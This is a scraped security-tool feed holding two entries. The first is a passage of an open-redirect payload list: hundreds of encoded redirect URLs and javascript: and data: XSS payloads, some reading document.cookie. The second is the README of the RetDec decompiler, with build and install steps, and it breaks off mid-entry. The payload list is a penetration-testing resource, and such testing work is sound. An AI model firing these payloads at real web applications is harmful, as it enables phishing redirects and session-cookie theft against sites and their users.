//https://[email\u00a0protected]//\n //google.com/%2e%2e%2f\n //[email\u00a0protected]/%2e%2e%2f\n ///google.com/%2e%2e%2f\n ///[email\u00a0protected]/%2e%2e%2f\n ////google.com/%2e%2e%2f\n ////[email\u00a0protected]/%2e%2e%2f\n https://google.com/%2e%2e%2f\n https://[email\u00a0protected]/%2e%2e%2f\n //https://google.com/%2e%2e%2f\n //https://[email\u00a0protected]/%2e%2e%2f\n ///google.com/%2e%2e\n ///[email\u00a0protected]/%2e%2e\n ////google.com/%2e%2e\n ////[email\u00a0protected]/%2e%2e\n https:///google.com/%2e%2e\n https:///[email\u00a0protected]/%2e%2e\n //https:///google.com/%2e%2e\n //[email\u00a0protected]:///google.com/%2e%2e\n /https://google.com/%2e%2e\n /https://[email\u00a0protected]/%2e%2e\n ///google.com/%2f%2e%2e\n ///[email\u00a0protected]/%2f%2e%2e\n ////google.com/%2f%2e%2e\n ////[email\u00a0protected]/%2f%2e%2e\n https:///google.com/%2f%2e%2e\n https:///exampl[email\u00a0protected]/%2f%2e%2e\n /https://google.com/%2f%2e%2e\n /https://[email\u00a0protected]/%2f%2e%2e\n /https:///google.com/%2f%2e%2e\n /https:///[email\u00a0protected]/%2f%2e%2e\n /%09/google.com\n /%09/[email\u00a0protected]\n //%09/google.com\n //%09/[email\u00a0protected]\n ///%09/google.com\n ///%09/[email\u00a0protected]\n ////%09/google.com\n ////%09/[email\u00a0protected]\n https://%09/google.com\n https://%09/[email\u00a0protected]\n /%5c google.com\n /%[email\u00a0protected]\n //%5cgoogle.com\n //%[email\u00a0protected]\n ///%5cgoogle.com\n ///%[email\u00a0protected]\n ////%5cgoogle.com\n ////%[email\u00a0protected]\n https://%5cgoogle.com\n https://%[email\u00a0protected]\n /https://%5cgoogle.com\n /https://%[email\u00a0protected]\n https://google.com\n https://[email\u00a0protected]\n javascript:alert(1);\n javascript:alert(1)\n //javascript:alert(1);\n /javascript:alert(1);\n //javascript:alert(1)\n /javascript:alert(1)\n /%5cjavascript:alert(1);\n /%5cjavascript:alert(1)\n //%5cjavascript:alert(1);\n //%5cjavascript:alert(1)\n /%09/javascript:alert(1);\n /%09/javascript:alert(1)\n java%0d%0ascript%0d%0a:alert(0)\n //google.com\n https:google.com\n //google%E3%80%82com\n \\/\\/google.com/\n /\\/google.com/\n //google.com\n https://example.com/https://google.com/\n \";alert(0);//\n javascript://example.com?%a0alert%281%29\n http://0 xd8.0x3a.0xd6.0xce\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://0xd83ad6ce\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://3627734734\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://472.314.470.462\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://0330.072.0326.0316\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://00330.00072.0000326.00000316\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://[::216.58.214.206]\n http: //[email\u00a0protected][::216.58.214.206]\n http://[email\u00a0protected][::216.58.214.206]\n http://XY>.7d8T\\[email\u00a0protected][::216.58.214.206]\n http://[::ffff:216.58.214.206]\n http://[email\u00a0protected][::ffff:216.58.214.206]\n http://[email\u00a0protected][::ffff:216.58.214.206]\n http://XY>.7d8T\\[email\u00a0protected][::ffff:216.58.214.206]\n http://0xd8.072.54990\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://0xd8.3856078\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://00330.3856078\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http://00330.0x3a.54990\n http://[email\u00a0protected]\n http://[email\u00a0protected]\n http://XY>.7d8T\\[email\u00a0protected]\n http:0xd8.0x3a.0xd6.0xce\n http:[email\u00a0protected]\n http:3H6 [email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:0xd83ad6ce\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:3627734734\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:472.314.470.462\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:0330.072.0326.0316\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:00330.00072.0000326.00000316\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:[::216.58.214.206]\n http:[email\u00a0protected][::216.58.214.206]\n http:[email\u00a0protected][::216.58.214.206]\n http:XY>.7d8T\\[email\u00a0protected][::216.58.214.206 ]\n http:[::ffff:216.58.214.206]\n http:[email\u00a0protected][::ffff:216.58.214.206]\n http:[email\u00a0protected][::ffff:216.58.214.206]\n http:XY>.7d8T\\[email\u00a0protected][::ffff:216.58.214.206]\n http:0xd8.072.54990\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:0xd8.3856078\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:00330.3856078\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n http:00330.0x3a.54990\n http:[email\u00a0protected]\n http:[email\u00a0protected]\n http:XY>.7d8T\\[email\u00a0protected]\n \u3031google.com\n \u3035google.com\n \u309dgoogle.com\n \u30fcgoogle.com\n \uff70google.com\n /\u3031google.com\n /\u3035google.com\n /\u309dgoogle.com\n /\u30fcgoogle.com\n /\uff70google.com\n %68%74%74 %70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d\n http://%67%6f%6f%67%6c%65%2e%63%6f%6d\n <>javascript:alert(1);\n <>//google.com\n //google.com\\@example.com\n https://:@google.com\\@example.com\n \\x6A\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x3aalert(1)\n \\u006A\\u0061\\u0076\\u0061\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003aalert(1)\n ja\\nva\\tscript\\r:alert(1)\n \\j\\av\\a\\s\\cr\\i\\pt\\:\\a\\l\\ert\\(1\\)\n \\152\\141\\166\\141\\163\\143\\162\\151\\160\\164\\072alert(1)\n http://google.com:80#@example.com/\n http://google.com:[email\u00a0protected]/\n http://[email\u00a0protected][email\u00a0protected]/\n http://XY>.7d8T\\[email\u00a0protected][email\u00a0protected]/\n http://[email\u00a0protected]@google.com/\n http://XY>.7d8T\\[email\u00a0protected]@google.com/\n http://example.com+&@google.com#[email\u00a0protected]/\n http://google.com\\texample.com/\n //google.com:80#@example.com/\n //google.com:[email\u00a0protected]/\n //[email\u00a0protected][email\u00a0protected]/\n //XY>.7d8T\\[email\u00a0protected] [email\u00a0protected]/\n //[email\u00a0protected]@google.com/\n //XY>.7d8T\\[email\u00a0protected]@google.com/\n //example.com+&@google.com#[email\u00a0protected]/\n //google.com\\texample.com/\n //;@google.com\n http://;@google.com\n @google.com\n javascript://https://example.com/?z=%0Aalert(1)\n data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=\n http://google.com%2f%2f.example.com/\n http://google.com%5c%5c.example.com/\n http://google.com%3F.example.com/\n http://google.com%23.example.com/\n http://example.com:80%40google.com/\n http://example.com%2egoogle.com/\n /x:1/:///%01javascript:alert(document.cookie)/\n /https:/%5cgoogle.com/\n javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)\n /http://google.com\n /%2f%2fgoogle.com\n /google.com/%2f%2e%2e\n /http:/google.com\n /.google.com\n ///\\;@google.com\n ///google.com\n /////google.com/\n\n \n** References : ** \n\n\n * [ CWE Entry 601 on Open Redirects. ](<https://cwe.mitre.org/data/definitions/601.html> \"CWE Entry 601 on Open Redirects.\" ) \n\n * [ WASC Article on URL Redirector Abuse ](<http://projects.webappsec.org/w/page/13246981/URL%20Redirector%20Abuse> \"WASC Article on URL Redirector Abuse\" ) \n\n * [ Google blog article on the dangers of open redirects. ](<https://googlewebmastercentral.blogspot.com/2009/01/open-redirect-urls-is-your-site-being.html> \"Google blog article on the dangers of open redirects.\" ) \n\n * [ Preventing Open Redirection Attacks (C#). ](<https://www.asp.net/mvc/tutorials/security/preventing-open-redirection-attacks> \"Preventing Open Redirection Attacks \\(C#\\).\" ) \n\n \n \n\n\n** [ Source Open-Redirect-Payload-List ](<https://github.com/payloadbox/open-redirect-payload-list> \"Download Open-Redirect-Payload-List\" ) **\n", "modified": "2019-12-07T11:00:01", "published": "2019-12-07T11:00:01", "id": "KITPLOIT:8925675766876700555", "href": "http://www.kitploit.com/2019/12/open-redirect-payload-list.html", "title": "Open Redirect Payload List", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-06T23:29:36", "bulletinFamily": "tools", "description": "[  ](<https://1.bp.blogspot.com/-jzsREV3t4o4/XemVrhRII6I/AAAAAAAARBs/ilxOWXVRtkQaN43iYmDU7nEk_qgV_osLgCNcBGAsYHQ/s1600/retdec.png>)\n\n \n[ RetDec ](<https://retdec.com/> \"RetDec\" ) is a retargetable machine-code [ decompiler ](<https://www.kitploit.com/search/label/Decompiler> \"decompiler\" ) based on [ LLVM ](<https://llvm.org/> \"LLVM\" ) . \nThe decompiler is not limited to any particular target architecture, operating system, or executable file format: \n\n\n * Supported file formats: ELF, PE, Mach-O, COFF, AR (archive), Intel HEX, and raw machine code \n * Supported architectures: \n * 32-bit: Intel x86, ARM, MIPS, PIC32, and PowerPC \n * 64-bit: x86-64, ARM64 (AArch64) \nFeatures: \n\n\n * Static analysis of executable files with detailed information. \n * Compiler and packer detection. \n * Loading and instruction decoding. \n * Signature-based removal of statically linked library code. \n * Extraction and utilization of [ debugging ](<https://www.kitploit.com/search/label/Debugging> \"debugging\" ) information (DWARF, PDB). \n * Reconstruction of instruction idioms. \n * Detection and reconstruction of C++ class hierarchies (RTTI, vtables). \n * Demangling of symbols from C++ binaries (GCC, MSVC, Borland). \n * Reconstruction of functions, types, and high-level constructs. \n * Integrated disassembler. \n * Output in two high-level languages: C and a Python-like language. \n * Generation of call graphs, control-flow graphs, and various statistics. \nFor more information, check out our \n\n\n * [ Wiki ](<https://github.com/avast/retdec/wiki> \"Wiki\" ) (in progress) \n * Botconf 2017 talk: [ slides ](<https://retdec.com/static/publications/retdec-slides-botconf-2017.pdf> \"slides\" ) , [ video ](<https://www.youtube.com/watch?v=HHFvtt5b6yY> \"video\" )\n * REcon Montreal 2018 talk: [ slides ](<https://retdec.com/static/publications/retdec-slides-recon-2018.pdf> \"slides\" )\n * [ Publications ](<https://retdec.com/publications/> \"Publications\" )\n \n** Installation and Use ** \nCurrently, we support Windows (7 or later), Linux, macOS, and (experimentally) FreeBSD. An installed version of RetDec requires approximately 4 GB of free disk space. \n \n** Windows ** \n\n\n 1. Either download and unpack a [ pre-built package ](<https://github.com/avast/retdec/releases> \"pre-built package\" ) , or build and install the decompiler by yourself (the process is described below). \n\n 2. Install [ Microsoft Visual C++ Redistributable for Visual Studio 2015 ](<https://www.microsoft.com/en-us/download/details.aspx?id=48145> \"Microsoft Visual C++ Redistributable for Visual Studio 2015\" ) . \n\n 3. Install the following programs: \n\n * [ Python ](<https://www.python.org/> \"Python\" ) (version >= 3.4) \n * [ UPX ](<https://upx.github.io/> \"UPX\" ) (Optional: if you want to use UPX unpacker in the preprocessing stage) \n * [ Graphviz ](<https://graphviz.gitlab.io/_pages/Download/windows/graphviz-2.38.msi> \"Graphviz\" ) (Optional: if you want to generate call or control flow graphs) \n 4. Now, you are all set to run the decompiler. To decompile a binary file named ` test.exe ` , run the following command (ensure that ` python ` runs Python 3; as an alternative, you can try ` py -3 ` ) \n\n \n python $RETDEC_INSTALL_DIR/bin/retdec-decompiler.py test.exe\n\nFor more information, run ` retdec-decompiler.py ` with ` --help ` . \n\n \n** Linux ** \n\n\n 1. Either download and unpack a [ pre-built package ](<https://github.com/avast/retdec/releases> \"pre-built package\" ) , or build and install the decompiler by yourself (the process is described below). \n\n 2. After you have built the decompiler, you will need to install the following packages via your distribution's package manager: \n\n * [ Python ](<https://www.python.org/> \"Python\" ) (version >= 3.4) \n * [ UPX ](<https://upx.github.io/> \"UPX\" ) (Optional: if you want to use UPX unpacker in the preprocessing stage) \n * [ Graphviz ](<https://www.graphviz.org/> \"Graphviz\" ) (Optional: if you want to generate call or control flow graphs) \n 3. Now, you are all set to run the decompiler. To decompile a binary file named ` test.exe ` , run \n\n \n $RETDEC_INSTALL_DIR/bin/retdec-decompiler.py test.exe\n\nFor more information, run ` retdec-decompiler.py ` with ` --help ` . \n\n \n** macOS ** \n\n\n 1. Either download and unpack a [ pre-built package ](<https://github.com/avast/retdec/releases> \"pre-built package\" ) , or build and install the decompiler by yourself (the process is described below). \n\n 2. After you have built the decompiler, you will need to install the following packages: \n\n * [ Python ](<https://www.python.org/> \"Python\" ) (version >= 3.4) \n * [ UPX ](<https://upx.github.io/> \"UPX\" ) (Optional: if you want to use UPX unpacker in the preprocessing stage) \n * [ Graphviz ](<https://www.graphviz.org/> \"Graphviz\" ) (Optional: if you want to generate call or control flow graphs) \n 3. Now, you are all set to run the decompiler. To decompile a binary file named ` test.exe ` , run \n\n \n $RETDEC_INSTALL_DIR/bin/retdec-decompiler.py test.exe\n\nFor more information, run ` retdec-decompiler.py ` with ` --help ` . \n\n \n** FreeBSD (Experimental) ** \n\n\n 1. There are currently no pre-built \"ports\" packages for FreeBSD. You will have to build and install the decompiler by yourself. The process is described below. \n\n 2. After you have built the decompiler, you may need to install the following packages and execute the following command: \n\n \n sudo pkg install python37\n sudo ln -s /usr/local/bin/python3.7 /usr/local/bin/python3\n\n 3. Now, you are all set to run the decompiler. To decompile a binary file named ` test.exe ` , run \n\n \n $RETDEC_INSTALL_DIR/bin/retdec-decompiler.py test.exe\n\nFor more information, run ` retdec-decompiler.py ` with ` --help ` . \n\n \n** Build and Installation ** \nThis section describes a local build and installation of RetDec. Instructions for Docker are given in the next section. \n \n** Requirements ** \n \n** Linux ** \n\n\n * A C++ compiler and standard C++ library supporting C++14 (e.g. GCC >= 5) \n * [ CMake ](<https://cmake.org/> \"CMake\" ) (version >= 3.6) \n * [ Git ](<https://git-scm.com/> \"Git\" )\n * [ Perl ](<https://www.perl.org/> \"Perl\" )\n * [ Python ](<https://www.python.org/> \"Python\" ) (version >= 3.4) \n * [ Bison ](<https://www.gnu.org/software/bison/> \"Bison\" ) (version >= 3.0) \n * [ Flex ](<https://www.gnu.org/software/flex/> \"Flex\" ) (version >= 2.6) \n * [ autotools ](<https://en.wikipedia.org/wiki/GNU_Build_System> \"autotools\" ) ( [ autoconf ](<https://www.gnu.org/software/autoconf/autoconf.html> \"autoconf\" ) , [ automake ](<https://www.gnu.org/software/automake/> \"automake\" ) , and [ libtool ](<https://www.gnu.org/software/libtool/> \"libtool\" ) ) \n * [ pkg-config ](<https://www.freedesktop.org/wiki/Software/pkg-config/> \"pkg-config\" )\n * [ m4 ](<https://www.gnu.org/software/m4/m4.html> \"m4\" )\n * [ zlib ](<https://zlib.net/> \"zlib\" )\n * Optional: [ Doxygen ](<https://www.stack.nl/~dimitri/doxygen/> \"Doxygen\" ) and [ Graphviz ](<https://www.graphviz.org/> \"Graphviz\" ) for generating API documentation \nOn Debian-based distributions (e.g. Ubuntu), the required packages can be installed with ` apt-get ` : \n\n \n \n sudo apt-get install build-essential cmake git perl python3 bison flex libfl-dev autoconf automake libtool pkg-config m4 zlib1g-dev upx doxygen graphviz\n\nOn RPM-based distributions (e.g. Fedora), the required packages can be installed with ` dnf ` : \n\n \n \n sudo dnf install gcc gcc-c++ cmake make git perl python3 bison flex autoconf automake libtool pkg-config m4 zlib-devel upx doxygen graphviz\n\nOn Arch Linux, the required packages can be installed with ` pacman ` : \n\n \n \n sudo pacman --needed -S base-devel cmake git perl python3 bison flex autoconf automake libtool pkg-config m4 zlib upx doxygen graphviz\n\n \n** Windows ** \n\n\n * Microsoft Visual C++ (version >= Visual Studio 2015 Update 2) \n * [ CMake ](<https://cmake.org/> \"CMake\" ) (version >= 3.6) \n * [ Git ](<https://git-scm.com/> \"Git\" )\n * [ Flex + Bison ](<https://sourceforge.net/projects/winflexbison/files/win_flex_bison3-latest.zip/download> \"Flex + Bison\" ) ( [ mirror ](<https://github.com/avast/retdec-support/releases/download/2018-07-27/win_flex_bison3-latest.zip> \"mirror\" ) ) from the [ Win flex-bison project ](<https://sourceforge.net/projects/winflexbison/> \"Win flex-bison project\" ) . Add the extracted directory to the system ` Path ` ( [ HOWTO ](<https://www.computerhope.com/issues/ch000549.htm> \"HOWTO\" ) ). \n * [ Active Perl ](<https://www.activestate.com/activeperl> \"Active Perl\" ) . It needs to be the first Perl in ` PATH ` , or it has to be provided to CMake using ` CMAKE_PROGRAM_PATH ` variable, e.g. ` -DCMAKE_PROGRAM_PATH=/c/perl/bin ` . Does NOT work with Strawberry Perl or MSYS2 Perl (you would have to install a pre-built version of OpenSSL, see below). \n * Alternatively, you can install OpenSSL directly from [ here ](<https://slproweb.com/products/Win32OpenSSL.html> \"here\" ) . This means OpenSSL won't be built and you don't need to install any Perl. Do not install Light version of OpenSSL as they don't contain development files. \n * [ Python ](<https://www.python.org/> \"Python\" ) (version >= 3.4) \n * Optional: [ Doxygen ](<http://ftp.stack.nl/pub/users/dimitri/doxygen-1.8.13-setup.exe> \"Doxygen\" ) and [ Graphviz ](<https://graphviz.gitlab.io/_pages/Download/windows/graphviz-2.38.msi> \"Graphviz\" ) for generating API documentation \n \n** macOS ** \nPackages should be preferably installed via [ Homebrew ](<https://brew.sh/> \"Homebrew\" ) . \n\n\n * Full Xcode installation ( [ including command-line tools ](<https://github.com/frida/frida/issues/338#issuecomment-426777849> \"including command-line tools\" ) , see [ #425 ](<https://github.com/avast/retdec/issues/425> \"#425\" ) and [ #433 ](<https://github.com/avast/retdec/issues/433> \"#433\" ) ) \n * [ CMake ](<https://cmake.org/> \"CMake\" ) (version >= 3.6) \n * [ Git ](<https://git-scm.com/> \"Git\" )\n * [ Perl ](<https://www.perl.org/> \"Perl\" )\n * [ Python ](<https://www.python.org/> \"Python\" ) (version >= 3.4) \n * [ Bison ](<https://www.gnu.org/software/bison/> \"Bison\" ) (version >= 3.0) \n * [ Flex ](<https://www.gnu.org/software/flex/> \"Flex\" ) (version >= 2.6) \n * [ autotools ](<https://en.wikipedia.org/wiki/GNU_Build_System> \"autotools\" ) ( [ autoconf ](<https://www.gnu.org/software/autoconf/autoconf.html> \"autoconf\" ) , [ automake ](<https://www.gnu.org/software/automake/> \"automake\" ) , and [ libtool ](<https://www.gnu.org/software/libtool/> \"libtool\" ) ) \n * Optional: [ Doxygen ](<https://www.stack.nl/~dimitri/doxygen/> \"Doxygen\" ) and [ Graphviz ](<https://www.graphviz.org/> \"Graphviz\" ) for generating API documentation \n \n** FreeBSD (Experimental) ** \nPackages should be installed via FreeBSDs pre-compiled package repository using the ` pkg ` command or built from scratch using the ` ports ` database method. \n\n\n * Full \"pkg\" tool instructions: [ handbook pkg method ](<https://www.freebsd.org/doc/handbook/pkgng-intro.html> \"handbook pkg method\" )\n * ` pkg install cmake python37 bison git autotools ` OR \n * Full \"ports\" instructions: [ handbook ports method ](<https://www.freebsd.org/doc/handbook/ports-using.html> \"handbook ports method\" )\n * ` portsnap fetch `\n * ` portsnap extract `\n * For example, ` cmake ` would be \n * ` whereis cmake `\n * ` cd /usr/ports/devel/cmake `\n * ` make install clean `\n \n** Process ** \nNote: Although RetDec now supports a system-wide installation ( [ #94 ](<https://github.com/avast/retdec/issues/94> \"#94\" ) ), unless you use your distribution's package manager to install it, we recommend installing RetDec locally into a designated directory. The reason for this is that uninstallation will be easier as you will only need to remove a single directory. To perform a local installation, run ` cmake ` with the ` -DCMAKE_INSTALL_PREFIX=<path> ` parameter, where ` <path> ` is directory into which RetDec will be installed (e.g. ` $HOME/projects/retdec-install ` on Linux and macOS, and ` C:\\projects\\retdec-install ` on Windows). \n\n\n * Clone the repository: \n * ` git clone https://github.com/avast/retdec `\n * Linux: \n * ` cd retdec `\n * ` mkdir build && cd build `\n * ` cmake .. -DCMAKE_INSTALL_PREFIX=<path> `\n * ` make -jN ` ( ` N ` is the number of processes to use for parallel build, typically number of cores + 1 gives fastest compilation time) \n * ` make install `\n * Windows: \n * Open a command prompt (e.g. ` cmd.exe ` ) \n * ` cd retdec `\n * ` mkdir build && cd build `\n * ` cmake .. -DCMAKE_INSTALL_PREFIX=<path> -G<generator> `\n * ` cmake --build . --config Release -- -m `\n * ` cmake --build . --config Release --target install `\n * Alternatively, you can open ` retdec.sln ` generated by ` cmake ` in Visual Studio IDE \n * macOS: \n * ` cd retdec `\n * ` mkdir build && cd build `\n * # Apple ships old Flex & Bison, so Homebrew versions should be used.\n export CMAKE_INCLUDE_PATH=\"/usr/local/opt/flex/include\"\n export CMAKE_LIBRARY_PATH=\"/usr/local/opt/flex/lib;/usr/local/opt/bison/lib\"\n export PATH=\"/usr/local/opt/flex/bin:/usr/local/opt/bison/bin:$PATH\"\n\n * ` cmake .. -DCMAKE_INSTALL_PREFIX=<path> `\n * ` make -jN ` ( ` N ` is the number of processes to use for parallel build, typically number of cores + 1 gives fastest compilation time) \n * ` make install `\n * FreeBSD: \n * ` sudo pkg install git cmake `\n * ` git clone https://github.com/avast/retdec `\n * ` cd retdec `\n * ` mkdir build && cd build `\n * # FreeBSD (and other BSDs) do need cmake, python3, bison, git, autotools. Flex and perl are pre-installed in the OS but check versions.\n # Later versions may be available for each of the packages.\n # See what is installed:\n sudo pkg info cmake python37 bison autotools\n # Install/upgrade them:\n sudo pkg install cmake python37 bison autotools\n\n * ` cmake .. -DCMAKE_INSTALL_PREFIX=<path> `\n * ` make -jN ` ( ` N ` is the number of processes to use for parallel build, typically number of cores + 1 gives fastest compilation time) \n * ` make install `\nYou have to pass the following parameters to ` cmake ` : \n\n\n * ` -DCMAKE_INSTALL_PREFIX=<path> ` to set the installation path to ` <path> ` . Quote the path if you are using backslashes on Windows (e.g. ` -DCMAKE_INSTALL_PREFIX=\"C:\\retdec\" ` ). \n * (Windows only) ` -G<generator> ` is ` -G\"Visual Studio 14 2015\" ` for 32-bit build using Visual Studio 2015, or ` -G\"Visual Studio 14 2015 Win64\" ` for 64-bit build using Visual Studio 2015. Later versions of Visual Studio may be used. \nYou can pass the following additional parameters to ` cmake ` : \n\n\n * ` -DRETDEC_DOC=ON ` to build with API documentation (requires Doxygen and Graphviz, disabled by default). \n * ` -DRETDEC_TESTS=ON ` to build with tests (disabled by default). \n * ` -DRETDEC_DEV_TOOLS=ON ` to build with development tools (disabled by default). \n * ` -DRETDEC_FORCE_OPENSSL_BUILD=ON ` to force OpenSSL build even if it is installed in the system (disabled by default). \n * ` -DRETDEC_COMPILE_YARA=OFF ` to disable YARA rules compilation at installation step (enabled by default). \n * ` -DCMAKE_BUILD_TYPE=Debug ` to build with debugging information, which is useful during development. By default, the project is built in the ` Release ` mode. This has no effect on Windows, but the same thing can be achieved by running ` cmake --build . ` with the ` --config Debug ` parameter. \n * ` -DCMAKE_PROGRAM_PATH=<path> ` to use Perl at ` <path> ` (probably useful only on Windows). \n * ` -D<dep>_LOCAL_DIR=<path> ` where ` <dep> ` is from ` {CAPSTONE, ELFIO, GOOGLETEST, JSONCPP, KEYSTONE, LIBDWARF, LLVM, PELIB, RAPIDJSON, TINYXML, YARACPP, YARAMOD} ` (e.g. ` -DCAPSTONE_LOCAL_DIR=<path> ` ), to use the local repository clone at ` <path> ` for RetDec dependency instead of downloading a fresh copy at build time. Multiple such options may be used at the same time. \n * ` -DRETDEC_ENABLE_<component>=ON ` to build only the specified component(s) (multiple such options can be used at once), and its (theirs) dependencies. By default, all the components are built. If at least one component is enabled via this mechanism, all the other components that were not explicitly enabled (and are not needed as dependencies of enabled components) are not built. See [ cmake/options.cmake ](<https://github.com/avast/retdec/blob/master/cmake/options.cmake> \"cmake/options.cmake\" ) for all the available component options. \n * ` -DRETDEC_ENABLE_ALL=ON ` can be used to (re-)enable all the components. \n * Alternatively, ` -DRETDEC_ENABLE=<comma-separated component list> ` can be used instead of ` -DRETDEC_ENABLE_<component>=ON ` (e.g. ` -DRETDEC_ENABLE=fileformat,loader,ctypesparser ` is equivalent to ` -DRETDEC_ENABLE_FILEFORMAT=ON -DRETDEC_ENABLE_LOADER=ON -DRETDEC_ENABLE_CTYPESPARSER=ON ` ). \n \n** Build in Docker ** \nDocker support is maintained by community. If something does not work for you or if you have suggestions for improvements, open an issue or PR. \n \n** Build Image ** \nBuilding in Docker does not require installation of the required libraries locally. This is a good option for trying out RetDec without setting up the whole build toolchain. \nTo build the RetDec Docker image, run \n\n \n \n docker build -t retdec - < Dockerfile\n\nThis builds the image from the master branch of this repository. \nTo build the image using the local copy of the repository, use the development Dockerfile, ` Dockerfile.dev ` : \n\n \n \n docker build -t retdec:dev . -f Dockerfile.dev\n\n \n** Run Container ** \nIf your ` uid ` is not 1000, make sure that the directory containing your input binary files is accessible for RetDec: \n\n \n \n chmod 0777 /path/to/local/directory\n\nNow, you can run the decompiler inside a container: \n\n \n \n docker run --rm -v /path/to/local/directory:/destination retdec retdec-decompiler.py /destination/binary\n\nNote: Do not modify the ` /destination ` part is. You only need to change ` /path/to/local/directory ` . Output files will then be generated to ` /path/to/local/directory ` . \n \n** Automated TeamCity Builds ** \nOur TeamCity servers are continuously generating [ up-to-date ](<https://www.kitploit.com/search/label/Up-to-date> \"up-to-date\" ) RetDec packages from the latest commit in the ` master ` branch. These are mostly meant to be used by RetDec developers, contributors, and other people experimenting with the product (e.g. testing if an issue present in the official release still exists in the current ` master ` ). \nYou can use these as you wish, but keep in mind that there are no guarantees they will work on your system (especially the Linux version), and that regressions are a possibility. To get a stable RetDec version, either download the latest official pre-built package or build the latest RetDec version tag. \n\n\n * [ Windows Server 2016, version 10.0 ](<https://retdec-tc.avast.com/repository/download/Retdec_WinBuild/.lastSuccessful/package/retdec-master-windows-64b.zip?guest=1> \"Windows Server 2016, version 10.0\" )\n * [ Ubuntu Bionic Linux, version 18.04 ](<https://retdec-tc.avast.com/repository/download/RetDec_LinuxBuild/.lastSuccessful/package/retdec-master-linux-64b.zip?guest=1> \"Ubuntu Bionic Linux, version 18.04\" )\n * [ Mac OS X, version 10.13.4 ](<https://retdec-tc.avast.com/repository/download/Retdec_MacBuild/.lastSuccessful/package/retdec-master-macos-64b.zip?guest=1> \"Mac OS X, version 10.13.4\" )\n \n** Repository Overview ** \nThis repository contains the following libraries: \n\n\n * ` ar-extractor ` \\- library for extracting object files from archives (based on LLVM). \n * ` bin2llvmir ` \\- library of LLVM passes for translating binaries into LLVM IR modules. \n * ` capstone2llvmir ` \\- binary instructions to LLVM IR translation library. \n * ` config ` \\- library for representing and managing RetDec configuration databases. \n * ` cpdetect ` \\- library for compiler and packer detection in binaries. \n * ` crypto ` \\- collection of cryptographic functions. \n * ` ctypes ` \\- C++ library for representing C function data types. \n * ` debugformat ` \\- library for uniform representation of DWARF and PDB debugging information. \n * ` demangler ` \\- demangling library capable to handle names generated by the GCC/Clang, Microsoft Visual C++, and Borland C++ compilers. \n * ` dwarfparser ` \\- library for high-level representation of DWARF debugging information. \n * ` fileformat ` \\- library for parsing and uniform representation of various object file formats. Currently supporting the following formats: COFF, ELF, Intel HEX, Mach-O, PE, raw data. \n * ` llvm-support ` \\- set of LLVM related utility functions. \n * ` llvmir-emul ` \\- LLVM IR emulation library used for unit testing. \n * ` llvmir2hll ` \\- library for translating LLVM IR modules to high-level source codes (C, Python-like language). \n * ` loader ` \\- library for uniform representation of binaries loaded to memory. Supports the same formats as fileformat. \n * ` macho-extractor ` \\- library for extracting regular Mach-O binaries from fat Mach-O binaries (based on LLVM). \n * ` patterngen ` \\- binary pattern extractor library. \n * ` pdbparser ` \\- Microsoft PDB files parser library. \n * ` stacofin ` \\- static code finder library. \n * ` unpacker ` \\- collection of unpacking functions. \n * ` utils ` \\- general C++ utility library. \nThis repository contains the following tools: \n\n\n * ` ar-extractortool ` \\- frontend for the ar-extractor library (installed as ` retdec-ar-extractor ` ). \n * ` bin2llvmirtool ` \\- frontend for the ` bin2llvmir ` library (installed as ` retdec-bin2llvmir ` ). \n * ` bin2pat ` \\- tool for generating patterns from binaries (installed as ` retdec-bin2pat ` ). \n * ` capstone2llvmirtool ` \\- frontend for the ` capstone2llvmir ` library (installed as ` retdec-capstone2llvmir ` ). \n * ` configtool ` \\- frontend for the ` config ` library (installed as ` retdec-config ` ). \n * ` ctypesparser ` \\- C++ library for parsing C function data types from JSON files into ` ctypes ` representation (installed as ` retdec-ctypesparser ` ). \n * ` demangler_grammar_gen ` \\-- tool for generating new grammars for the ` demangler ` library (installed as ` retdec-demangler-grammar-gen ` ). \n * ` demanglertool ` \\-- frontend for the ` demangler ` library (installed as ` retdec-demangler ` ). \n * ` fileinfo ` \\- [ binary analysis ](<https://www.kitploit.com/search/label/Binary%20Analysis> \"binary analysis\" ) tool. Supports the same formats as ` fileformat ` (installed as ` retdec-fileinfo ` ). \n * ` idr2pat ` \\- tool for extracting patterns from IDR knowledge bases (installed as ` retdec-idr2pat ` ). \n * ` llvmir2hlltool ` \\- frontend for the ` llvmir2hll ` library (installed as ` 